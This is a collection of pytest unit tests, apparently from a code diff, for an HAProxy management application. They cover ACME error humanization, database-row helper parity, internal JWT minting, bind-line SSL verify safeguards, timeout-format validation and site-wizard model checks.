@pytest.mark.parametrize("problem_type,detail_text,expected_title_contains", [
("urn:ietf:params:acme:error:rateLimited", "too many orders", "rate limit"),
("urn:ietf:params:acme:error:dns", "no A record", "DNS"),
("urn:ietf:params:acme:error:caa", "issuance forbidden", "CAA"),
("urn:ietf:params:acme:error:connection", "timeout to :80", "could not connect"),
("urn:ietf:params:acme:error:incorrectResponse", "wrong key auth", "challenge response"),
("urn:ietf:params:acme:error:unauthorized", "verification failed", "Unauthorized"),
("urn:ietf:params:acme:error:malformed", "missing field 'csr'", "Malformed"),
("urn:ietf:params:acme:error:badNonce", "stale nonce", "nonce"),
("urn:ietf:params:acme:error:rejectedIdentifier", "blacklisted", "rejected"),
("urn:ietf:params:acme:error:serverInternal", "internal err", "ACME server"),
("urn:ietf:params:acme:error:userActionRequired", "agree to ToS", "User action"),
])
def test_known_problem_types_are_humanized(problem_type, detail_text, expected_title_contains):
payload = json.dumps({"type": problem_type, "detail": detail_text, "status": 400})
out = humanize_error_detail(payload)
assert expected_title_contains.lower() in out["title"].lower(), (
f"Title '{out['title']}' missing expected substring '{expected_title_contains}'"
)
assert out["message"] == detail_text
assert out["status"] == 400
assert out["type"] == problem_type
# Hint should be a non-empty operator-targeted string
assert isinstance(out["hint"], str) and len(out["hint"]) > 10
def test_unknown_problem_type_falls_back_to_generic_title():
payload = json.dumps({
"type": "urn:ietf:params:acme:error:notARealType",
"detail": "future error",
"status": 500,
})
out = humanize_error_detail(payload)
assert out["title"] == "ACME error"
assert out["message"] == "future error"
assert out["hint"] == ""
assert out["status"] == 500
assert out["type"] == "urn:ietf:params:acme:error:notARealType"
# ----------------------------------------------------------------------------
# 5. Subproblems (per-domain failures) flatten cleanly.
# ----------------------------------------------------------------------------
def test_subproblems_are_flattened():
payload = json.dumps({
"type": "urn:ietf:params:acme:error:malformed",
"detail": "multiple validation failures",
"status": 400,
"subproblems": [
{
"type": "urn:ietf:params:acme:error:dns",
"detail": "no record for foo",
"identifier": {"type": "dns", "value": "foo.example.com"},
},
{
"type": "urn:ietf:params:acme:error:caa",
"detail": "caa forbids",
"identifier": {"type": "dns", "value": "bar.example.com"},
},
],
})
out = humanize_error_detail(payload)
assert "subproblems" in out
assert len(out["subproblems"]) == 2
sp = {item["identifier"]: item for item in out["subproblems"]}
assert sp["foo.example.com"]["type"] == "urn:ietf:params:acme:error:dns"
assert sp["bar.example.com"]["detail"] == "caa forbids"
def test_subproblems_with_garbage_entries_are_filtered():
payload = json.dumps({
"type": "urn:ietf:params:acme:error:malformed",
"detail": "x",
"subproblems": [
"not a dict", # filtered out
None, # filtered out
{"type": "urn:ietf:params:acme:error:dns", "detail": "ok"},
],
})
out = humanize_error_detail(payload)
assert len(out["subproblems"]) == 1
assert out["subproblems"][0]["detail"] == "ok"
# ----------------------------------------------------------------------------
# 6. Dict input is accepted directly (avoids double-encode in some callers).
# ----------------------------------------------------------------------------
def test_dict_input_handled_directly():
out = humanize_error_detail({
"type": "urn:ietf:params:acme:error:rateLimited",
"detail": "limit reached",
"status": 429,
})
assert "rate limit" in out["title"].lower()
assert out["message"] == "limit reached"
assert out["status"] == 429
@@ -0,0 +1,183 @@
"""
v1.5.0 service extraction parity — apply_service.
Asserts:
- _resolve_user_id falls back to the first active admin user using the
CORRECT schema columns (is_admin, is_active) — NOT the non-existent
is_super_admin (M46/R65).
- _mint_internal_jwt passes user_id under both `sub` and `user_id` claims so
it round-trips through get_current_user_from_token.
- apply_cluster_pending delegates to routers.cluster.apply_pending_changes
with a Bearer header (i.e. NEVER duplicates the ~800-line apply pipeline).
"""
from unittest.mock import AsyncMock, patch
import pytest
from services.apply_service import (
_mint_internal_jwt,
_resolve_user_id,
apply_cluster_pending,
)
# ----------------------------------------------------------------------------
# _resolve_user_id
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_resolve_user_id_passthrough_when_user_still_valid():
"""Bulgu #27: a still-active user_id is returned as-is after re-validation."""
fake_conn = AsyncMock()
# First fetchval validates the requested user, returns its id.
fake_conn.fetchval.return_value = 42
with patch(
"services.apply_service.get_database_connection",
AsyncMock(return_value=fake_conn),
), patch(
"services.apply_service.close_database_connection",
AsyncMock(),
):
out = await _resolve_user_id(42)
assert out == 42
@pytest.mark.asyncio
async def test_resolve_user_id_falls_back_when_requested_user_inactive():
"""Bulgu #27: deleted/deactivated created_by must NOT mint a ghost JWT —
fall back to the admin user instead."""
fake_conn = AsyncMock()
# Validation lookup returns None (user gone/inactive); admin fallback returns 1.
fake_conn.fetchval.side_effect = [None, 1]
with patch(
"services.apply_service.get_database_connection",
AsyncMock(return_value=fake_conn),
), patch(
"services.apply_service.close_database_connection",
AsyncMock(),
):
out = await _resolve_user_id(99)
assert out == 1
assert fake_conn.fetchval.await_count == 2
@pytest.mark.asyncio
async def test_resolve_user_id_falls_back_to_active_admin():
fake_conn = AsyncMock()
fake_conn.fetchval.return_value = 1 # admin id
with patch(
"services.apply_service.get_database_connection",
AsyncMock(return_value=fake_conn),
), patch(
"services.apply_service.close_database_connection",
AsyncMock(),
):
out = await _resolve_user_id(None)
assert out == 1
sql, *_ = fake_conn.fetchval.call_args.args
# Schema accuracy: is_admin AND is_active (NOT is_super_admin)
assert "is_admin" in sql
assert "is_active" in sql
assert "is_super_admin" not in sql
@pytest.mark.asyncio
async def test_resolve_user_id_returns_none_when_no_admin():
fake_conn = AsyncMock()
fake_conn.fetchval.return_value = None
with patch(
"services.apply_service.get_database_connection",
AsyncMock(return_value=fake_conn),
), patch(
"services.apply_service.close_database_connection",
AsyncMock(),
):
out = await _resolve_user_id(None)
assert out is None
# ----------------------------------------------------------------------------
# _mint_internal_jwt
# ----------------------------------------------------------------------------
def test_mint_internal_jwt_includes_both_claim_shapes():
"""sub + user_id ensures compat with get_current_user_from_token."""
captured = {}
def fake_create(payload, expires_delta=None):
captured.update(payload)
captured["__expires"] = expires_delta
return "fake-jwt-token"
with patch("services.apply_service.create_access_token", side_effect=fake_create):
token = _mint_internal_jwt(99)
assert token == "fake-jwt-token"
assert captured["sub"] == "99"
assert captured["user_id"] == 99
assert captured["__expires"] is not None
# ----------------------------------------------------------------------------
# apply_cluster_pending
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_apply_cluster_pending_raises_when_no_admin_available():
with patch(
"services.apply_service._resolve_user_id",
AsyncMock(return_value=None),
):
with pytest.raises(RuntimeError, match="no admin user available"):
await apply_cluster_pending(cluster_id=1)
@pytest.mark.asyncio
async def test_apply_cluster_pending_delegates_to_router_with_bearer():
"""Delegate, don't duplicate. We pass through cluster_id, apply_request,
and a Bearer auth header.
"""
apply_mock = AsyncMock(return_value={"applied_count": 3})
# Patch the local-imported symbol via routers.cluster
with patch(
"services.apply_service._resolve_user_id",
AsyncMock(return_value=42),
), patch(
"services.apply_service._mint_internal_jwt",
return_value="fake.jwt.token",
), patch("routers.cluster.apply_pending_changes", apply_mock):
out = await apply_cluster_pending(
cluster_id=7,
apply_request={"force": True},
)
assert out == {"applied_count": 3}
kwargs = apply_mock.call_args.kwargs
assert kwargs["cluster_id"] == 7
assert kwargs["apply_request"] == {"force": True}
assert kwargs["authorization"].startswith("Bearer ")
assert "fake.jwt.token" in kwargs["authorization"]
@pytest.mark.asyncio
async def test_apply_cluster_pending_default_empty_apply_request():
apply_mock = AsyncMock(return_value={})
with patch(
"services.apply_service._resolve_user_id",
AsyncMock(return_value=1),
), patch(
"services.apply_service._mint_internal_jwt",
return_value="t",
), patch("routers.cluster.apply_pending_changes", apply_mock):
await apply_cluster_pending(cluster_id=1)
kwargs = apply_mock.call_args.kwargs
assert kwargs["apply_request"] == {}
@@ -0,0 +1,176 @@
"""
v1.5.0 service extraction parity — backend_service.
Asserts that create_backend_row + create_server_row pass the SAME column-set
and ordering that POST /api/backends and POST /api/backends/{id}/servers
already use. This protects us from a subtle field-drift regression that
would only surface as silent NULL columns in the wizard's bulk-create.
Notes:
- We don't run the actual SQL, we capture the SQL+args via a mock conn and
assert on the column names + argument count.
- M13 helper extension: mark_pending=True must follow the INSERT with a
UPDATE last_config_status='PENDING' (matching the existing endpoint).
"""
from types import SimpleNamespace
from unittest.mock import AsyncMock
import pytest
from services.backend_service import (
_filter_httpchk_from_options,
create_backend_row,
create_server_row,
)
# ----------------------------------------------------------------------------
# _filter_httpchk_from_options
# ----------------------------------------------------------------------------
def test_filter_httpchk_strips_only_httpchk_lines():
raw = "option httpchk GET /healthz\noption http-server-close\nbalance roundrobin"
out = _filter_httpchk_from_options(raw)
assert "httpchk" not in out
assert "http-server-close" in out
assert "balance roundrobin" in out
def test_filter_httpchk_handles_empty_input():
assert _filter_httpchk_from_options(None) is None
assert _filter_httpchk_from_options("") == ""
def test_filter_httpchk_handles_only_httpchk_returns_none():
assert _filter_httpchk_from_options("option httpchk GET /") is None
# ----------------------------------------------------------------------------
# create_backend_row column parity
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_create_backend_row_inserts_all_expected_columns():
conn = AsyncMock()
conn.fetchval.return_value = 7
payload = SimpleNamespace(
name="be_test",
balance_method="leastconn",
mode="http",
health_check_uri="/healthz",
health_check_interval=2000,
health_check_expected_status=200,
timeout_connect=10000,
timeout_server=60000,
timeout_queue=60000,
options=None,
)
new_id = await create_backend_row(conn, payload, cluster_id=1)
assert new_id == 7
# Verify INSERT shape
sql, *args = conn.fetchval.call_args.args
assert "INSERT INTO backends" in sql
# 19 placeholders => 19 args
assert len(args) == 19
assert args[0] == "be_test"
assert args[1] == "leastconn"
assert args[18] == 1 # cluster_id last positional
# mark_pending=True default → UPDATE last_config_status='PENDING'
update_calls = [c for c in conn.execute.call_args_list
if c.args and "UPDATE backends" in c.args[0]]
assert len(update_calls) == 1
assert "last_config_status='PENDING'" in update_calls[0].args[0]
@pytest.mark.asyncio
async def test_create_backend_row_mark_pending_false_skips_update():
conn = AsyncMock()
conn.fetchval.return_value = 5
payload = SimpleNamespace(
name="be_x", balance_method="roundrobin", mode="http",
)
await create_backend_row(conn, payload, cluster_id=1, mark_pending=False)
update_calls = [c for c in conn.execute.call_args_list
if c.args and "UPDATE backends" in c.args[0]]
assert update_calls == []
@pytest.mark.asyncio
async def test_create_backend_row_filters_httpchk_from_options():
conn = AsyncMock()
conn.fetchval.return_value = 1
payload = SimpleNamespace(
name="be_x",
balance_method="roundrobin",
mode="http",
options="option httpchk GET /\nbalance roundrobin",
)
await create_backend_row(conn, payload, cluster_id=1)
sql, *args = conn.fetchval.call_args.args
options_arg = args[14] # 15th positional (1-indexed $15)
assert "httpchk" not in (options_arg or "")
assert "balance roundrobin" in (options_arg or "")
# ----------------------------------------------------------------------------
# create_server_row column parity
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_create_server_row_inserts_all_expected_columns():
conn = AsyncMock()
conn.fetchval.return_value = 11
server = SimpleNamespace(
server_name="srv1",
server_address="10.0.0.1",
server_port=8080,
weight=100,
check_enabled=True,
backup_server=False,
ssl_enabled=False,
)
new_id = await create_server_row(
conn, backend_id=7, backend_name="be_test", cluster_id=1, server=server,
)
assert new_id == 11
sql, *args = conn.fetchval.call_args.args
assert "INSERT INTO backend_servers" in sql
assert len(args) == 22
assert args[0] == 7 # backend_id
assert args[1] == "be_test" # backend_name
assert args[2] == "srv1"
assert args[3] == "10.0.0.1"
assert args[4] == 8080
assert args[21] == 1 # cluster_id last positional
# mark_pending=True default → UPDATE
update_calls = [c for c in conn.execute.call_args_list
if c.args and "UPDATE backend_servers" in c.args[0]]
assert len(update_calls) == 1
@pytest.mark.asyncio
async def test_create_server_row_uses_server_address_not_host():
"""Schema accuracy R38: column is server_address NOT host or ip."""
conn = AsyncMock()
conn.fetchval.return_value = 1
server = SimpleNamespace(
server_name="s", server_address="10.1.1.1", server_port=80,
weight=100, check_enabled=True, backup_server=False, ssl_enabled=False,
)
await create_server_row(conn, 1, "be", 1, server)
sql, *_ = conn.fetchval.call_args.args
# Verify the column list explicitly mentions server_address, server_port, server_name
assert "server_address" in sql
assert "server_port" in sql
assert "server_name" in sql
File diff suppressed because it is too large Load Diff
@@ -0,0 +1,154 @@
"""
v1.5.0 service extraction parity — frontend_service.
Asserts:
- create_frontend_row writes BOTH ssl_certificate_id (INT col) AND
ssl_certificate_ids (JSONB col) consistently (M13).
- check_bind_port_collision honours exclude_frontend_id (M21/R35).
- mark_pending toggles the follow-up UPDATE.
"""
import json
from types import SimpleNamespace
from unittest.mock import AsyncMock
import pytest
from services.frontend_service import (
check_bind_port_collision,
create_frontend_row,
)
# ----------------------------------------------------------------------------
# create_frontend_row
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_create_frontend_row_writes_both_ssl_columns_when_cert_present():
"""M13: ssl_certificate_id (INT) and ssl_certificate_ids (JSONB) both set."""
conn = AsyncMock()
conn.fetchval.return_value = 99
payload = SimpleNamespace(
name="fe_https",
bind_address="0.0.0.0",
bind_port=443,
default_backend="be",
mode="http",
ssl_enabled=True,
)
new_id = await create_frontend_row(
conn, payload, cluster_id=1,
ssl_certificate_id=42, ssl_enabled=True,
)
assert new_id == 99
sql, *args = conn.fetchval.call_args.args
assert "INSERT INTO frontends" in sql
# ssl_certificate_id position $7 → index 6
assert args[6] == 42
# ssl_certificate_ids position $8 → index 7 (JSONB-encoded)
assert json.loads(args[7]) == [42]
@pytest.mark.asyncio
async def test_create_frontend_row_emits_empty_ssl_cert_ids_when_no_cert():
conn = AsyncMock()
conn.fetchval.return_value = 1
payload = SimpleNamespace(name="fe", bind_address="*", bind_port=80, mode="http")
await create_frontend_row(conn, payload, cluster_id=1)
sql, *args = conn.fetchval.call_args.args
assert args[6] is None # ssl_certificate_id NULL
assert json.loads(args[7]) == [] # ssl_certificate_ids JSONB empty list
@pytest.mark.asyncio
async def test_create_frontend_row_uses_name_override():
conn = AsyncMock()
conn.fetchval.return_value = 1
payload = SimpleNamespace(name="fe_http", bind_address="*", bind_port=80, mode="http")
await create_frontend_row(conn, payload, cluster_id=1, name_override="fe_http-https")
sql, *args = conn.fetchval.call_args.args
assert args[0] == "fe_http-https"
@pytest.mark.asyncio
async def test_create_frontend_row_uses_bind_port_override():
conn = AsyncMock()
conn.fetchval.return_value = 1
payload = SimpleNamespace(name="fe", bind_address="*", bind_port=80, mode="http")
await create_frontend_row(conn, payload, cluster_id=1, bind_port_override=443)
sql, *args = conn.fetchval.call_args.args
assert args[2] == 443 # bind_port position $3
@pytest.mark.asyncio
async def test_create_frontend_row_jsonb_rules_serialized():
conn = AsyncMock()
conn.fetchval.return_value = 1
payload = SimpleNamespace(
name="fe", bind_address="*", bind_port=80, mode="http",
acl_rules=[{"name": "a"}],
redirect_rules=[{"type": "redirect"}],
use_backend_rules=[{"backend": "be"}],
)
await create_frontend_row(conn, payload, cluster_id=1)
sql, *args = conn.fetchval.call_args.args
# acl_rules ($20 idx 19), redirect_rules ($21 idx 20), use_backend_rules ($22 idx 21)
assert json.loads(args[19]) == [{"name": "a"}]
assert json.loads(args[20]) == [{"type": "redirect"}]
assert json.loads(args[21]) == [{"backend": "be"}]
@pytest.mark.asyncio
async def test_create_frontend_row_mark_pending_default_true():
conn = AsyncMock()
conn.fetchval.return_value = 1
payload = SimpleNamespace(name="fe", bind_address="*", bind_port=80, mode="http")
await create_frontend_row(conn, payload, cluster_id=1)
update_calls = [c for c in conn.execute.call_args_list
if c.args and "UPDATE frontends" in c.args[0]]
assert len(update_calls) == 1
@pytest.mark.asyncio
async def test_create_frontend_row_mark_pending_false_skips_update():
conn = AsyncMock()
conn.fetchval.return_value = 1
payload = SimpleNamespace(name="fe", bind_address="*", bind_port=80, mode="http")
await create_frontend_row(conn, payload, cluster_id=1, mark_pending=False)
update_calls = [c for c in conn.execute.call_args_list
if c.args and "UPDATE frontends" in c.args[0]]
assert update_calls == []
# ----------------------------------------------------------------------------
# check_bind_port_collision
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_check_bind_port_collision_returns_id_when_conflict():
conn = AsyncMock()
conn.fetchval.return_value = 17
out = await check_bind_port_collision(conn, 1, "0.0.0.0", 80)
assert out == 17
@pytest.mark.asyncio
async def test_check_bind_port_collision_no_conflict_returns_none():
conn = AsyncMock()
conn.fetchval.return_value = None
out = await check_bind_port_collision(conn, 1, "0.0.0.0", 80)
assert out is None
@pytest.mark.asyncio
async def test_check_bind_port_collision_excludes_frontend_id():
conn = AsyncMock()
conn.fetchval.return_value = None
await check_bind_port_collision(conn, 1, "0.0.0.0", 443, exclude_frontend_id=99)
sql, *args = conn.fetchval.call_args.args
assert "id <> $4" in sql
assert args[3] == 99
@@ -0,0 +1,112 @@
"""R11.A-2 (PR-1 hotfix) — bind-side ssl_verify safeguard parity.
Pre-fix HISTORY:
R18 audit added literal ``bind_line += f" verify {ssl_verify}"`` on
both the multi-cert and single-cert HTTPS bind branches so that the
inbound mTLS column would reach the rendered HAProxy config (it
was previously a placebo).
Pre-PR-1 BUG (the reason these assertions were inverted):
Emitting ``verify required|optional`` on a `bind` line WITHOUT a
``ca-file <path>`` argument makes HAProxy fail with the fatal
ALERT::
Proxy 'X': verify is enabled but no CA file specified for bind '...'
The `frontends` schema does not have a client-CA bundle column yet
(planned for PR-7 via ``ssl_client_ca_certificate_id``), so EVERY
frontend with ``ssl_verify ∈ {required, optional}`` (the column
DEFAULT was ``'optional'`` until PR-2) broke ``haproxy -c`` reload
the moment the consolidated config touched it. The user's reported
bug was exactly this: pre-existing entities they had not modified
failed validation after a wizard reject + apply cycle.
PR-1 fix in haproxy_config.py:
Both bind branches now route through `_apply_bind_ssl_verify`, which
resolves a client-CA bundle path via `_resolve_frontend_client_ca_path`
and only appends ``ca-file <path> verify <mode>`` when the path is
resolvable. Until PR-7 lands the resolver always returns ``None``,
so ``verify`` is silently skipped with an ERROR log — preventing the
fatal ALERT while preserving the operator's intent in audit
diagnostics.
These tests are static source assertions; integration coverage lives
in tests/test_site_wizard_round11.py.
"""
import re
from pathlib import Path
import pytest
_GEN = (
Path(__file__).resolve().parent.parent
/ "services" / "haproxy_config.py"
)
def _src():
if not _GEN.exists():
pytest.skip("services/haproxy_config.py not present in this env")
return _GEN.read_text()
def test_legacy_verbatim_verify_emit_removed():
"""The pre-PR-1 verbatim ``bind_line += f" verify {ssl_verify}"``
must NOT remain in the generator. This pattern is the one that
caused the fatal HAProxy ALERT 'verify is enabled but no CA file
specified' when the frontend lacked a client-CA bundle.
"""
src = _src()
matches = re.findall(
r'bind_line\s*\+=\s*f"\s+verify\s+\{[^}]*ssl_verify[^}]*\}"',
src,
)
assert not matches, (
"PR-1 R11.A-2 regression: legacy verbatim ssl_verify emit "
"pattern reappeared — bind line will trigger fatal HAProxy "
"ALERT when ssl_verify=required|optional and no client-CA is "
"configured. Use `_apply_bind_ssl_verify` instead."
)
def test_apply_bind_ssl_verify_helper_called_in_both_branches():
"""Both the multi-cert (NEW mode) and single-cert (OLD mode)
HTTPS bind branches must route ssl_verify through the safeguard
helper, ensuring symmetric treatment of the directive."""
src = _src()
matches = re.findall(
r"bind_line\s*=\s*_apply_bind_ssl_verify\(\s*bind_line\s*,",
src,
)
assert len(matches) >= 2, (
f"PR-1 R11.A-2 regression: expected `_apply_bind_ssl_verify(...)` "
f"in BOTH bind branches (multi-cert + single-cert); found "
f"{len(matches)} occurrence(s)"
)
def test_apply_bind_ssl_verify_skips_when_no_client_ca():
"""The helper must skip the `verify` directive when no client-CA
bundle is resolvable, logging an ERROR for diagnostics. This is
the explicit safeguard against the fatal HAProxy ALERT."""
src = _src()
assert "BIND SSL_VERIFY DOWNGRADE" in src, (
"PR-1 R11.A-2 regression: missing diagnostic ERROR log when "
"ssl_verify is skipped due to absent client-CA bundle"
)
assert "_resolve_frontend_client_ca_path" in src, (
"PR-1 R11.A-2 regression: missing client-CA path resolver "
"(forward-path placeholder for PR-7 ssl_client_ca_certificate_id)"
)
def test_strict_sni_still_emitted_unchanged():
"""Sanity check: the existing `strict-sni` directive emission must
not have been damaged by the PR-1 hotfix changes."""
src = _src()
cnt = src.count('bind_line += " strict-sni"')
assert cnt >= 2, (
"PR-1 regression: `strict-sni` directive emission count "
"dropped — the safeguard refactor was destructive"
)
File diff suppressed because it is too large Load Diff
@@ -0,0 +1,107 @@
"""
Phase K Phase D follow-up (Bulgu #10) — HAProxy heuristic
validator timeout-value regex must accept the FULL set of HAProxy
time unit suffixes, not just single-character ones.
Per the HAProxy docs (Time format chapter), accepted units are:
us microseconds
ms milliseconds
s seconds
m minutes
h hours
d days
A bare integer (no suffix) is also accepted and interpreted as
milliseconds. Pre-fix the regex was `^\\d+[smhd]?$`, which rejected
`ms` and `us` outright. The Site Wizard's config synthesis emits
`timeout connect 10000ms` / `timeout server 60000ms` / `timeout
client 100ms`, so the dry-run preview surfaced 10+ FALSE-POSITIVE
errors on the wizard's own defaults and the operator could not
reach Create even though the real HAProxy `-c` parse was happy.
These tests pin the regex (or its semantic) so a future
"simplification" cannot regress us back to the buggy form.
"""
import pytest
from utils.haproxy_validator import HAProxyConfigValidator, ValidationLevel
def _validate_timeout_only(args):
"""Run the validator's private `_validate_timeout_directive`
method and return the list of results so we can assert on the
exact error messages without coupling to the public surface.
"""
v = HAProxyConfigValidator()
v._validate_timeout_directive(args)
return v.results
@pytest.mark.parametrize(
"value",
[
"10000ms",
"60000ms",
"100ms",
"30000ms",
"5s",
"1m",
"1h",
"1d",
"500us", # microseconds — also valid per HAProxy docs
"0", # bare integer (= ms)
"10000", # bare integer (= ms)
],
)
def test_timeout_regex_accepts_all_haproxy_time_units(value):
"""All HAProxy-valid time formats must produce ZERO ERROR-level
results from the timeout heuristic. (WARNING-level results from
OTHER checks — unknown timeout type, etc. — are allowed but
must not be raised by these well-formed examples.)
"""
results = _validate_timeout_only(["connect", value])
errors = [r for r in results if r.level == ValidationLevel.ERROR]
assert errors == [], (
f"Bulgu #10 regression: timeout value '{value}' was flagged "
f"as ERROR by the heuristic validator, but HAProxy `-c` "
f"accepts it. Errors: {[e.message for e in errors]}"
)
@pytest.mark.parametrize(
"value",
[
"10000xx", # bogus suffix
"abc", # not a number
"-100ms", # negative
"1.5s", # decimal not supported
"ms", # suffix only
],
)
def test_timeout_regex_still_rejects_invalid_formats(value):
"""Real malformed timeout values must still surface as ERROR —
the regex relaxation must NOT degenerate into "accept anything".
"""
results = _validate_timeout_only(["connect", value])
errors = [r for r in results if r.level == ValidationLevel.ERROR]
assert any("Invalid timeout value" in e.message for e in errors), (
f"Bulgu #10 over-relaxation regression: timeout value '{value}' "
f"slipped past the heuristic. HAProxy would reject this at parse."
)
def test_timeout_regex_rejects_legacy_ms_was_pre_fix_failure_mode():
"""Documentary pin — the EXACT failure mode reported by the
operator (Image #8 of Phase K Phase D Bulgu #10): the wizard's
default `timeout connect 10000ms` flagged ERROR on Step 4. Pin
that the value is accepted post-fix.
"""
for tval in ("10000ms", "60000ms", "100ms"):
results = _validate_timeout_only(["connect", tval])
for r in results:
if r.level == ValidationLevel.ERROR:
assert "Invalid timeout value" not in r.message, (
f"Bulgu #10 post-fix pin: the wizard-default "
f"timeout value '{tval}' must be accepted by "
f"the heuristic validator. Got error: {r.message}"
)
+365
View File
@@ -0,0 +1,365 @@
"""
v1.5.0 Feature B — Site Setup Wizard model + helper unit tests.
Coverage matrix (Section 6.4 of the v1.5.0 plan):
- SiteCreate field validation
* domain regex normalisation (M10)
* acme mode REQUIRES apply_immediately=true (M22)
* acme mode REQUIRES frontend.mode='http' AND bind_port=80
(HTTP-01 challenge; Round 10 micro-finding)
- BackendStep / FrontendStep
* '_' system-prefix rejection
* https_redirect & redirect_rules mutual-exclusion (M19)
- _strip_pem_from_payload (draft persistence; M14/M9)
These tests stay 100% in the Pydantic model surface — no DB, no FastAPI
TestClient — so they run hermetically alongside the existing pure-unit
tests in this directory.
"""
import pytest
from pydantic import ValidationError
from models.site_wizard import (
BackendStep,
FrontendStep,
SiteCreate,
ServerStep,
SSLChoice,
_strip_pem_from_payload,
)
# ----------------------------------------------------------------------------
# Helper builders
# ----------------------------------------------------------------------------
def _backend(name="be_test", **overrides):
return {"name": name, **overrides}
def _server(server_name="srv1", **overrides):
return {
"server_name": server_name,
"server_address": "10.0.0.1",
"server_port": 8080,
**overrides,
}
def _frontend(name="fe_http", mode="http", bind_port=80, **overrides):
return {"name": name, "mode": mode, "bind_port": bind_port, **overrides}
_DUMMY_CERT_PEM = "-----BEGIN CERTIFICATE-----\nMIIBdummy\n-----END CERTIFICATE-----"
_DUMMY_KEY_PEM = "-----BEGIN PRIVATE KEY-----\nMIIBdummy\n-----END PRIVATE KEY-----"
def _ssl_for_mode(ssl_mode):
"""Bulgu #31: 'upload' / 'existing' modes need shape-valid payloads."""
if ssl_mode == "upload":
return {
"mode": "upload",
"name": "cert-test",
"certificate_content": _DUMMY_CERT_PEM,
"private_key_content": _DUMMY_KEY_PEM,
}
if ssl_mode == "existing":
return {"mode": "existing", "ssl_certificate_id": 1}
return {"mode": ssl_mode}
def _payload(ssl_mode="none", apply_immediately=False, **overrides):
base = {
"cluster_id": 1,
"domains": ["www.example.com"],
"backend": _backend(),
"servers": [_server()],
"frontend": _frontend(),
"ssl": _ssl_for_mode(ssl_mode),
"apply_immediately": apply_immediately,
}
base.update(overrides)
return base
# ----------------------------------------------------------------------------
# Domain validation
# ----------------------------------------------------------------------------
def test_payload_normalises_domain_to_lowercase():
p = SiteCreate(**_payload(domains=["WWW.Example.COM"]) | {"domains": ["WWW.Example.COM"]})
assert p.domains == ["www.example.com"]
def test_payload_rejects_garbage_domain():
with pytest.raises(ValidationError):
SiteCreate(**(_payload() | {"domains": ["not a domain"]}))
def test_payload_accepts_wildcard_subdomain():
p = SiteCreate(**(_payload() | {"domains": ["*.example.com"]}))
assert p.domains == ["*.example.com"]
def test_payload_rejects_empty_domains_list():
with pytest.raises(ValidationError):
SiteCreate(**(_payload() | {"domains": []}))
# ----------------------------------------------------------------------------
# Backend / frontend system-prefix rejection
# ----------------------------------------------------------------------------
def test_backend_rejects_underscore_prefix():
with pytest.raises(ValidationError):
BackendStep(**_backend(name="_acme_challenge_backend"))
def test_frontend_rejects_underscore_prefix():
with pytest.raises(ValidationError):
FrontendStep(**_frontend(name="_internal_fe"))
def test_backend_accepts_normal_name():
bs = BackendStep(**_backend(name="be_legitimate"))
assert bs.name == "be_legitimate"
def test_backend_rejects_invalid_chars():
with pytest.raises(ValidationError):
BackendStep(**_backend(name="be with spaces"))
# ----------------------------------------------------------------------------
# https_redirect / redirect_rules mutual exclusion (M19)
# ----------------------------------------------------------------------------
def test_frontend_rejects_https_redirect_with_redirect_rules():
with pytest.raises(ValidationError, match="mutually exclusive"):
FrontendStep(**_frontend(
https_redirect=True,
redirect_rules=[{"from": "/", "to": "https://x"}],
))
def test_frontend_accepts_https_redirect_alone():
fe = FrontendStep(**_frontend(https_redirect=True))
assert fe.https_redirect is True
assert fe.redirect_rules == []
def test_frontend_accepts_redirect_rules_alone():
fe = FrontendStep(**_frontend(
https_redirect=False,
redirect_rules=[{"from": "/", "to": "https://x"}],
))
assert fe.https_redirect is False
assert len(fe.redirect_rules) == 1
# ----------------------------------------------------------------------------
# ACME mode enforcement (M22 + Round 10 micro-finding)
# ----------------------------------------------------------------------------
def test_acme_mode_requires_apply_immediately():
with pytest.raises(ValidationError, match="apply_immediately=true"):
SiteCreate(**_payload(ssl_mode="acme", apply_immediately=False))
def test_acme_mode_requires_frontend_mode_http():
with pytest.raises(ValidationError, match="frontend.mode='http'"):
SiteCreate(**(_payload(ssl_mode="acme", apply_immediately=True)
| {"frontend": _frontend(mode="tcp")}))
def test_acme_mode_allows_non_80_bind_port():
"""Bulgu #34 (round-15 audit) — pre-fix the model validator hard-
rejected any ACME payload with `frontend.bind_port != 80`. That
blanket rule didn't fit the canonical enterprise pattern (one
shared port-80 frontend host-routing many sites), so operators
on multi-tenant clusters were stuck — port 80 collided with the
existing shared frontend, and any other port was rejected here.
The cluster-aware reachability check has moved to the route
handler (`_validate_acme_port80_reachable`) where DB lookups are
available; the model layer no longer blocks based on bind_port.
"""
p = SiteCreate(**(_payload(ssl_mode="acme", apply_immediately=True)
| {"frontend": _frontend(bind_port=8080)}))
assert p.ssl.mode == "acme"
assert p.frontend.bind_port == 8080
def test_acme_mode_happy_path():
p = SiteCreate(**_payload(ssl_mode="acme", apply_immediately=True))
assert p.ssl.mode == "acme"
assert p.apply_immediately is True
def test_non_acme_mode_does_not_force_apply_immediately():
p = SiteCreate(**_payload(ssl_mode="none", apply_immediately=False))
assert p.apply_immediately is False
def test_upload_mode_does_not_force_http_frontend():
"""Upload mode should accept any frontend port — HTTPS bind is the cert's job.
R14 #v2: must use distinct ports for HTTP vs HTTPS otherwise the
bind_port==https_bind_port collision validator fires (correctly —
HAProxy can't bind the same address:port twice). Pick 8080 / 8443
so we exercise BOTH the 'non-80 HTTP allowed' path AND the new
distinct-port invariant simultaneously.
"""
p_kwargs = _payload(ssl_mode="upload", apply_immediately=False) | {
"frontend": _frontend(bind_port=8080),
"ssl": {
"mode": "upload",
"name": "x",
"certificate_content": "-----BEGIN CERTIFICATE-----\nx\n-----END CERTIFICATE-----",
"private_key_content": "-----BEGIN PRIVATE KEY-----\nx\n-----END PRIVATE KEY-----",
"https_bind_port": 8443,
},
}
p = SiteCreate(**p_kwargs)
assert p.frontend.bind_port == 8080
assert p.ssl.https_bind_port == 8443
# ----------------------------------------------------------------------------
# Bulgu #31: upload mode rejects empty/missing PEMs and missing cert name
# ----------------------------------------------------------------------------
def test_upload_mode_rejects_empty_certificate_content():
payload = _payload(ssl_mode="upload")
payload["ssl"] = {**payload["ssl"], "certificate_content": ""}
with pytest.raises(ValidationError) as ei:
SiteCreate(**payload)
assert "certificate_content" in str(ei.value)
